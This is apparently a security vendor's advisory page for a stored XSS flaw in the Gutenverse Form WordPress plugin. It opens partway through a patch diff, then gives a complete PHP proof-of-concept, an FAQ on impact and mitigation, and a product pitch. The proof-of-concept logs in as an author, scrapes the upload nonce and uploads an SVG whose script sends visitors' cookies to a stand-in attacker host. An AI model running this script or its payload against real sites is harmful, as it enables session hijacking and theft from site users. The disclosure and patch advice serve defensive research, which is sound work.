+			$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg );
+			$next_text = $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );

 			if ( $pre_next_text && 'false' !== $pre_next_text ) {
-				$prev_text = '<i class="' . $prev_icon . '"></i> ' . esc_html__( 'Prev', 'gutenverse-form' );
-				$next_text = $next_innet_text . '  <i class="' . $next_icon . '"></i>';
+				$prev_text = $this->render_icon( $prev_icon_type, $prev_icon, $prev_icon_svg ) . ' ' . esc_html__( 'Prev', 'gutenverse-form' );
+				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

 			$output = '<div class="guten_block_nav native-pagination" data-page="' . $page . '">';
--- a/gutenverse-form/lib/framework/includes/class-api.php
+++ b/gutenverse-form/lib/framework/includes/class-api.php
@@ -167,6 +167,16 @@
 			)
 		);

+		register_rest_route(
+			self::ENDPOINT,
+			'image-sizes',
+			array(
+				'methods'             => 'GET',
+				'callback'            => array( $this, 'get_image_sizes' ),
+				'permission_callback' => 'gutenverse_permission_check_author',
+			)
+		);
+
 		// Template Library.
 		register_rest_route(
 			self::ENDPOINT,
@@ -1905,4 +1915,31 @@

 		return null;
 	}
+
+	/**
+	 * Get Image Sizes.
+	 *
+	 * @return WP_REST_Response
+	 */
+	public function get_image_sizes() {
+		$sizes             = wp_get_registered_image_subsizes();
+		$image_sizes       = array();
+		$excluded_defaults = array( 'medium_large', '1536x1536', '2048x2048' );
+
+		foreach ( $sizes as $slug => $size ) {
+			if ( ! in_array( $slug, $excluded_defaults, true ) ) {
+				$image_sizes[] = array(
+					'label' => ucwords( str_replace( '-', ' ', $slug ) ) . ' (' . $size['width'] . 'x' . $size['height'] . ')',
+					'value' => $slug,
+				);
+			}
+		}
+
+		$image_sizes[] = array(
+			'label' => 'Full',
+			'value' => 'full',
+		);
+
+		return new WP_REST_Response( $image_sizes, 200 );
+	}
 }
--- a/gutenverse-form/lib/framework/includes/class-assets.php
+++ b/gutenverse-form/lib/framework/includes/class-assets.php
@@ -139,7 +139,7 @@
 		wp_register_style(
 			'gutenverse-frontend-style',
 			GUTENVERSE_FRAMEWORK_URL_PATH .

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14984 - Gutenverse Form <= 2.3.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

<?php
/**
 * Proof of Concept for CVE-2025-14984
 * Requires valid WordPress author credentials
 * Uploads malicious SVG with JavaScript payload
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'author_user'; // CHANGE THIS
$password = 'author_pass'; // CHANGE THIS

// Malicious SVG with JavaScript payload
$svg_payload = '<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
  <script type="text/javascript">
    // XSS payload - exfiltrate cookies to attacker server
    var img = new Image();
    img.src = "https://attacker-server.com/steal?c=" + encodeURIComponent(document.cookie);
  </script>
  <rect width="100" height="100" fill="red"/>
  <text x="20" y="50" fill="white">Atomic Edge PoC</text>
</svg>';

// Create temporary file
$temp_file = tempnam(sys_get_temp_dir(), 'svg_');
file_put_contents($temp_file, $svg_payload);

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check login success by looking for dashboard
if (strpos($login_response, 'wp-admin') === false) {
    echo "[!] Login failed. Check credentials.n";
    exit;
}

echo "[+] Successfully logged in as $usernamen";

// Get nonce for media upload (from media library page)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/media-new.php');
$media_page = curl_exec($ch);

// Extract upload nonce (pattern may vary)
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $media_page, $nonce_matches);
if (empty($nonce_matches[1])) {
    // Try alternative nonce pattern
    preg_match('/"plupload":{"_wpnonce":"([a-f0-9]+)"/', $media_page, $nonce_matches);
}

if (empty($nonce_matches[1])) {
    echo "[!] Could not extract upload nonce. Trying direct upload anyway.n";
    $nonce = '';
} else {
    $nonce = $nonce_matches[1];
    echo "[+] Found upload nonce: $noncen";
}

// Prepare file upload via async-upload.php
$post_data = [
    'name' => 'atomic_edge_poc.svg',
    'action' => 'upload-attachment',
    '_wpnonce' => $nonce
];

$file_data = [
    'async-upload' => new CURLFile($temp_file, 'image/svg+xml', 'atomic_edge_poc.svg')
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/async-upload.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_data, $file_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: multipart/form-data']);

$upload_response = curl_exec($ch);
curl_close($ch);

// Clean up temp file
unlink($temp_file);

// Parse response
if (strpos($upload_response, '"success":true') !== false) {
    // Extract uploaded file URL
    preg_match('/"url":"([^"]+)"/', $upload_response, $url_matches);
    if (!empty($url_matches[1])) {
        $svg_url = stripslashes($url_matches[1]);
        echo "[+] Malicious SVG uploaded successfully!n";
        echo "[+] File URL: $svg_urln";
        echo "[+] When viewed, this SVG will execute JavaScript in the victim's browsern";
    } else {
        echo "[+] Upload successful but could not parse URL. Response: $upload_responsen";
    }
} else {
    echo "[!] Upload failed. Response: $upload_responsen";
    echo "[!] The site may be patched or have additional security controls.n";
}
?>

Frequently Asked Questions

What is CVE-2025-14984?
Overview of the vulnerability
CVE-2025-14984 is a stored cross-site scripting (XSS) vulnerability affecting the Gutenverse Form plugin for WordPress, specifically in versions up to and including 2.3.2. This vulnerability allows authenticated users with Author-level access or higher to upload malicious SVG files that can execute JavaScript in the context of users viewing the file.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the Gutenverse Form plugin allows SVG file uploads without proper sanitization of the file contents. An attacker can upload an SVG file containing malicious JavaScript, which executes when the file is viewed by other users, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the Gutenverse Form plugin version 2.3.2 or earlier is affected. Specifically, authenticated users with Author-level access or higher can exploit this vulnerability, making it crucial for site administrators to assess their user roles and plugin versions.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To determine if your site is vulnerable, check the version of the Gutenverse Form plugin installed. If it is version 2.3.2 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Author-level access or higher.
How can I fix or mitigate this issue?
Recommended actions for administrators
The recommended fix is to update the Gutenverse Form plugin to version 2.4.0 or later, which addresses the vulnerability. Additionally, consider restricting file upload permissions and implementing security measures such as file type validation and content sanitization.
What does the CVSS score of 6.4 indicate?
Understanding risk levels
The CVSS score of 6.4 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires authenticated access, thus limiting the potential impact compared to higher severity vulnerabilities.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability could allow attackers to execute arbitrary JavaScript in the context of users who view the malicious SVG file. This could lead to session hijacking, unauthorized actions on behalf of users, website defacement, or redirection to malicious sites.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an authenticated user can upload a malicious SVG file containing JavaScript that exfiltrates cookies to an attacker’s server. This demonstrates the ease of exploitation and the potential for serious security breaches if the vulnerability is not addressed.
Is there a patch available for this vulnerability?
Details on the fix
Yes, a patch is available in version 2.4.0 of the Gutenverse Form plugin. However, it is important to review the patch notes to ensure that all security concerns are adequately addressed.
What additional security measures can I implement?
Enhancing overall site security
In addition to updating the plugin, consider implementing a web application firewall, regularly auditing user roles, and using security plugins that provide file upload restrictions and sanitization features to further protect your site.
What should I do if I cannot update the plugin immediately?
Interim measures for affected sites
If you cannot update the plugin immediately, temporarily disable the Gutenverse Form plugin or restrict access to the media upload functionality for users with Author-level permissions until a secure version is installed.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Regularly monitor security advisories from the WordPress community, subscribe to vulnerability databases, and follow security blogs to stay informed about new vulnerabilities and best practices for securing your WordPress site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations